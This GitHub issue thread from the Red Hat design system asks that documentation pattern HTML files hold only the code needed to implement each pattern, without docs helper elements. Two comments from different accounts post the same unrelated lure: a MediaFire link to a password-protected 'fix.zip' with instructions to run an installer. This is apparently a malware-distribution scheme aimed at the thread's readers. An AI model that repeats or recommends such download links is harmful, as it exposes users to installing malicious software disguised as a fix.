### ISSUE TITLE
[docs] patterns html files should be self-sufficient

### ISSUE THREAD

**Issue by bennypowers** [RedHat-UX/red-hat-design-system#1779]
### Description

the files in `docs/patterns/*/patterns/*.html` contain `<uxdot-pattern>` and `<rh-code-block>` elements, 
in order to improve readability, we should move those out into the docs pages themselves, 
such that the html files contain *only* the code necessary to implement the pattern, 
and no special docs helpers
i think it's ok for those files to link to pattern-definition css files like `logo-wall.css` for example, but not for them to contain uxdot helpers

That way, if a user would copy-and-paste the contents of a pattern html file into a blank html document (with an appropriate import map already available), they would receive the desired outcome.

Certainly, there must not be any `<rh-code-block>` elements in the pattern files, (except of course, the files related to code block patterns)

The uxdot-pattern element, and the docs-browsing experience it provides is excellent and we should keep it, just that we should wrap the contents of those files in that element, and not the other way around

### Steps to reproduce

see https://github.com/RedHat-UX/red-hat-design-system/blob/98e54690d82c35039f7f2743444b7177b46bd748/docs/patterns/card/patterns/asset.html#L51 

### Expected behaviour

there shouldn't be uxdot helper elements in those files

### Operating System (OS)

iOS, macOS, Linux, Windows

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by markcaron** [comment]
Good idea
